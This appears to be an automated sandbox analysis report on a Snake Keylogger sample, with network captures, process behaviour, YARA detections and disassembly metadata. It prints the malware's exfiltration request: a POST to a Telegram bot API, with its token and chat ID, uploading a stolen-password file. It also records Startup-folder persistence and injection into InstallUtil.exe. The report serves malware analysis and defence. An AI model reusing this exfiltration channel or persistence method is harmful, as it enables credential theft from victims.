                                                                    2024-10-30 00:42:31 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    16192.168.2.449764188.114.97.3443600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:33 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-10-30 00:42:33 UTC893INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:33 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56463
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xe%2BDTwySMBcEl%2FZop4bX7eQFfqmMoM382CurpSkDC1KaA8jA2o%2FqW%2FuvdJalOOs13Ezztbfw3UFsbM25%2B77KQ%2FNDo%2FjoyaQMRo12GflILWuPgoq6YO55LAGVyr56MQYXrRvvNjvz"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75db4e9504672-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1055&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2364081&cwnd=249&unsent_bytes=0&cid=5b1cf6685ac83c82&ts=163&x=0"
                                                                    2024-10-30 00:42:33 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    17192.168.2.449766188.114.97.3443600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:34 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-10-30 00:42:34 UTC881INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:34 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56464
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kR0igYzTcWZyiHGpcMJS8abzimGhC51YFb5ZxcFtg7bSsRqO8JbK3NJbRmxkfAkCzpQ4pxYl7w83tit5UiLrdHdDy1d9E9oHUhdBGtoKOGfFWW5k%2BIhFhypBxxmvysmZgvVsreaJ"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75dbdca2d4672-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2064&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1502074&cwnd=249&unsent_bytes=0&cid=df2a95ca786fdb2d&ts=151&x=0"
                                                                    2024-10-30 00:42:34 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.449768188.114.97.3443600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:35 UTC87OUTGET /xml/173.254.250.72 HTTP/1.1
                                                                    Host: reallyfreegeoip.org
                                                                    Connection: Keep-Alive
                                                                    2024-10-30 00:42:36 UTC887INHTTP/1.1 200 OK
                                                                    Date: Wed, 30 Oct 2024 00:42:36 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 359
                                                                    Connection: close
                                                                    apigw-requestid: AZ6gpggEPHcESXQ=
                                                                    Cache-Control: max-age=31536000
                                                                    CF-Cache-Status: HIT
                                                                    Age: 56466
                                                                    Last-Modified: Tue, 29 Oct 2024 09:01:30 GMT
                                                                    Accept-Ranges: bytes
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZGodBxnJIzX6ZqSUSmSiezKS0R56IwwO0m3O5QSuvt%2FQxmTXk32PWAVfMCGnKP42xq11NFIjNqBdBLBX7FI6fNOuAGgcJ1iwh7ZOIPR9zonrrzwkD%2BWemjxgHh2IGxcifC2Y2%2Fm%2B"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 8da75dc719cde983-DFW
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1907&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=1538788&cwnd=247&unsent_bytes=0&cid=466f87bb51c350b4&ts=165&x=0"
                                                                    2024-10-30 00:42:36 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 32 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                    Data Ascii: <Response><IP>173.254.250.72</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.449769149.154.167.220443600C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-30 00:42:42 UTC350OUTPOST /bot7698096781:AAGQLD6o1kzjfTe7ym-NWYz9KeQ-WUS_Q04/sendDocument?chat_id=6243598265&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8dcf8ffd3cd5362
                                                                    Host: api.telegram.org
                                                                    Content-Length: 566
                                                                    Connection: Keep-Alive
                                                                    2024-10-30 00:42:42 UTC566OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 38 66 66 64 33 63 64 35 33 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 37 32 31 36 38 30 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 39 2f 31 30 2f 32 30 32 34 20 2f 20 32 30 3a 34 32 3a 32 34 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20
                                                                    Data Ascii: --------------------------8dcf8ffd3cd5362Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:721680Date and Time: 29/10/2024 / 20:42:24Client IP:
                                                                    2024-10-30 00:42:42 UTC388INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Wed, 30 Oct 2024 00:42:42 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 481
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2024-10-30 00:42:42 UTC481INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 36 39 38 30 39 36 37 38 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 48 41 4d 50 50 50 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 48 41 4d 50 52 45 53 55 4c 54 42 4f 54 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 34 33 35 39 38 32 36 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 75 70 65 72 6e 61 74 75 72 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 30 32 34 38 39 36 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 2c 22
                                                                    Data Ascii: {"ok":true,"result":{"message_id":410,"from":{"id":7698096781,"is_bot":true,"first_name":"CHAMPPP","username":"CHAMPRESULTBOT"},"chat":{"id":6243598265,"first_name":"Supernatural","type":"private"},"date":1730248962,"document":{"file_name":"SnakePW.txt","


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:20:41:59
                                                                    Start date:29/10/2024
                                                                    Path:C:\Users\user\Desktop\Ndnownts.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\Desktop\Ndnownts.exe"
                                                                    Imagebase:0x200000
                                                                    File size:54'272 bytes
                                                                    MD5 hash:297E05EE6CE9A0E345F5053D87AC7401
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1758641024.0000000006310000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1750536952.0000000003588000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1741258818.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1741258818.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1741258818.00000000029F3000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1741258818.0000000002626000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1750536952.000000000360A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:1
                                                                    Start time:20:42:05
                                                                    Start date:29/10/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                    Imagebase:0xbd0000
                                                                    File size:42'064 bytes
                                                                    MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.4150876359.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4150876359.00000000031FB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4150876359.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4150876359.0000000003133000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.4147081297.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.4150876359.0000000002F71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:3
                                                                    Start time:20:42:17
                                                                    Start date:29/10/2024
                                                                    Path:C:\Windows\System32\wscript.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IsInvalid.vbs"
                                                                    Imagebase:0x7ff6b60a0000
                                                                    File size:170'496 bytes
                                                                    MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:20:42:18
                                                                    Start date:29/10/2024
                                                                    Path:C:\Users\user\AppData\Roaming\IsInvalid.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\IsInvalid.exe"
                                                                    Imagebase:0xaa0000
                                                                    File size:54'272 bytes
                                                                    MD5 hash:297E05EE6CE9A0E345F5053D87AC7401
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.1940767610.0000000003FF9000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.1926811297.0000000003016000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1926811297.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.1926811297.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000004.00000002.1926811297.00000000033C8000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 46%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:7
                                                                    Start time:20:42:23
                                                                    Start date:29/10/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                    Imagebase:0x110000
                                                                    File size:42'064 bytes
                                                                    MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4151007876.00000000026CE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4151007876.0000000002704000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4151007876.0000000002630000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.4151007876.0000000002471000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    Disassembly

                                                                    Reset < >

                                                                      Executed Functions

                                                                      Function 00B6D388 Relevance: 6.0, Strings: 4, Instructions: 983COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: TJcq$Te^q$pbq$xbaq
                                                                      • API String ID: 0-1954897716
                                                                      • Opcode ID: 2def0807417bb3949e98a9e7fb9b39edadbeaf484db1ce6f044fddcaf0a94d9b
                                                                      • Instruction ID: 9d5658699e4b4619c364f707da037f61c2de52df77118a0de07b9dcc1e976a6c
                                                                      • Opcode Fuzzy Hash: 2def0807417bb3949e98a9e7fb9b39edadbeaf484db1ce6f044fddcaf0a94d9b
                                                                      • Instruction Fuzzy Hash: D2A2B675E00628CFDB64CF69C984A99BBB2FF89304F1581E9D509AB365DB319E81CF40
                                                                      Function 00B692E0 Relevance: 2.7, Strings: 2, Instructions: 175COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q$4'^q
                                                                      • API String ID: 0-2697143702
                                                                      • Opcode ID: 94c77f94c41190d9cbd44bbb9e22da6d81f197890a7b64416486b29f81a1529b
                                                                      • Instruction ID: bbb49c1c1ef23df066eb2e9938bb4b9cf26b382a0d43b2a9a46cd2e0a884fc9b
                                                                      • Opcode Fuzzy Hash: 94c77f94c41190d9cbd44bbb9e22da6d81f197890a7b64416486b29f81a1529b
                                                                      • Instruction Fuzzy Hash: E4715C70E00205CFD748EFBAE990A99BBF6FF88300F14D129D154AB379EB70590A9B55
                                                                      Function 00B692F0 Relevance: 2.7, Strings: 2, Instructions: 165COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1740944695.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_b60000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 4'^q$4'^q
                                                                      • API String ID: 0-2697143702
                                                                      • Opcode ID: 5e7d65b034079e421bd5e6ab937fff0b7b1d046fd37d11650272b1a4b4673bc8
                                                                      • Instruction ID: feeb85e6649e33491b0a2c14214ab7ef30d7e68794f12529e169d8668cc1f967
                                                                      • Opcode Fuzzy Hash: 5e7d65b034079e421bd5e6ab937fff0b7b1d046fd37d11650272b1a4b4673bc8
                                                                      • Instruction Fuzzy Hash: 4D712C70E00205CFD748EFAAE990A99BBF7FF88300F14D129D154AB379EB70590A9B55
                                                                      Function 06C9F160 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1759228041.0000000006C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C80000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6c80000_Ndnownts.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Deq
                                                                      • API String ID: 0-948982800
                                                                      • Opcode ID: d97f3aafa34803873c1489f30696155749879062301677317f4e9c8c31120c04
